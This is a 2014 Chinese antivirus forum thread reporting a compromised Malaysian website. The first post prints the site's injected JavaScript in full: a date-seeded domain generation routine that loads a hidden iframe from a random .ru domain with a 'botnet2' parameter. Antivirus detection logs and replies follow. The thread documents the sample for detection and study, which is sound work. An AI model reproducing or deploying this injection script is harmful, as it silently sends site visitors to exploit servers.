查看: 3021|回复: 3
收起左侧

[已鉴定] http://www.apexadvisory.com.my/

[复制链接]
fireold
发表于 2014-1-5 07:34:17 | 显示全部楼层 |阅读模式
  1. function nextRandomNumber() {
  2.     var hi = this.seed / this.Q;
  3.     var lo = this.seed % this.Q;
  4.     var test = this.A * lo - this.R * hi;
  5.     if (test > 0) {
  6.         this.seed = test;
  7.     } else {
  8.         this.seed = test + this.M;
  9.     }
  10.     return (this.seed * this.oneOverM);
  11. }

  12. function RandomNumberGenerator(unix) {
  13.     var d = new Date(unix * 1000);
  14.     var s = d.getHours() > 12 ? 1 : 0;
  15.     this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
  16.     this.A = 48271;
  17.     this.M = 2147483647;
  18.     this.Q = this.M / this.A;
  19.     this.R = this.M % this.A;
  20.     this.oneOverM = 1.0 / this.M;
  21.     this.next = nextRandomNumber;
  22.     return this;
  23. }

  24. function createRandomNumber(r, Min, Max) {
  25.     return Math.round((Max - Min) * r.next() + Min);
  26. }

  27. function generatePseudoRandomString(unix, length, zone) {
  28.     var rand = new RandomNumberGenerator(unix);
  29.     var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
  30.     var str = '';
  31.     for (var i = 0; i < length; i++) {
  32.         str += letters[createRandomNumber(rand, 0, letters.length - 1)];
  33.     }
  34.     return str + '.' + zone;
  35. }

  36. setTimeout(function() {
  37.     try {
  38.         if (typeof iframeWasCreated == "undefined") {
  39.             iframeWasCreated = true;
  40.             var unix = Math.round(+new Date() / 1000);
  41.             var domainName = generatePseudoRandomString(unix, 16, 'ru');
  42.             ifrm = document.createElement("IFRAME");
  43.             ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet2");
  44.             ifrm.style.width = "0px";
  45.             ifrm.style.height = "0px";
  46.             ifrm.style.visibility = "hidden";
  47.             document.body.appendChild(ifrm);
  48.         }
  49.     } catch (e) {}
  50. }, 500);
复制代码

  1. j % 2
复制代码


Avira
2014/1/5 上午 07:30 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A6GBLLHM\apexadvisory_com_my[1].htm'
      包含病毒或有害的程式 'JS/Expack.VU.1' [virus]
      已採取動作:
      檔案會移動至 '5a4336a9.qua' 名稱底下的隔離區目錄!

2014/1/5 上午 07:30 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描.]。
      檔案數:        796
      目錄數:        0
      惡意程式碼數:        1
      警告數:        0

2014/1/5 上午 07:29 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A6GBLLHM\apexadvisory_com_my[1].htm 中
      偵測到病毒或有害的程式 'JS/Expack.VU.1 [virus]'
      執行的動作:傳輸至掃描程式

2014/1/5 上午 07:29 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\A6GBLLHM\apexadvisory_com_my[1].htm 中
      偵測到病毒或有害的程式 'JS/Expack.VU.1 [virus]'
      執行的動作:拒絕存取

2014/1/5 上午 07:29 [Web Protection] 發現惡意程式碼
      從 URL "http://www.apexadvisory.com.my/" 存取資料時,
      發現病毒或有害的程式 'JS/Expack.VU.1' [virus]。
      已採取動作:已略過


av2.jpg



fs is
fs2.jpg
zmzcy
发表于 2014-1-5 12:54:31 | 显示全部楼层
阻止了 www.apexadvisory.com.my 的入侵企图,已阻止,Web Attack: Mass Injection Website 2

文件名: apexadvisory_com_my[1].htm
威胁名称: Trojan.Malscript
完整路径: c:\users\mr\appdata\local\microsoft\windows\temporary internet files\low\content.ie5\2v9o9wt7\apexadvisory_com_my[1].htm

____________________________



详细信息
未知的社区使用情况,&nbsp; 未知的文件存在时间,&nbsp; 风险 高





原始
下载自
&nbsp;未知





活动
已执行的操作: 已执行的操作: 1



____________________________



在电脑上的创建时间&nbsp;
不可用


上次使用时间&nbsp;
2014/1/5 ( 12:53:46 )


启动项目&nbsp;



已启动&nbsp;



____________________________


未知
诺顿社区中使用了此文件的用户数 未知。

未知
此文件版本当前 未知。


此文件具有高风险。

威胁类型: 病毒。 将自身插入或附加到其他程序、文件或电脑区域以感染这些媒介的程序。



____________________________



来源: 外部介质



____________________________

文件操作

文件: c:\users\mr\appdata\local\microsoft\windows\temporary internet files\low\content.ie5\2v9o9wt7\ apexadvisory_com_my[1].htm 已删除
____________________________


文件指纹 - SHA:
f4b5a29712faac48458cb73de263ad5cf371cd15e934053582303165924a07a0
文件指纹 - MD5:
不可用
hhh900
发表于 2014-1-5 20:41:55 | 显示全部楼层
zmzcy 发表于 2014-1-5 12:54
阻止了 www.apexadvisory.com.my 的入侵企图,已阻止,Web Attack: Mass Injection Website 2

文件名: ape ...

常在河边走,哪有不湿鞋?
尤金丶卡巴斯基
发表于 2014-1-6 11:58:14 | 显示全部楼层
微点杀毒,微点主防均报,杀毒处理成功
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-2-4 17:55 , Processed in 0.130974 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表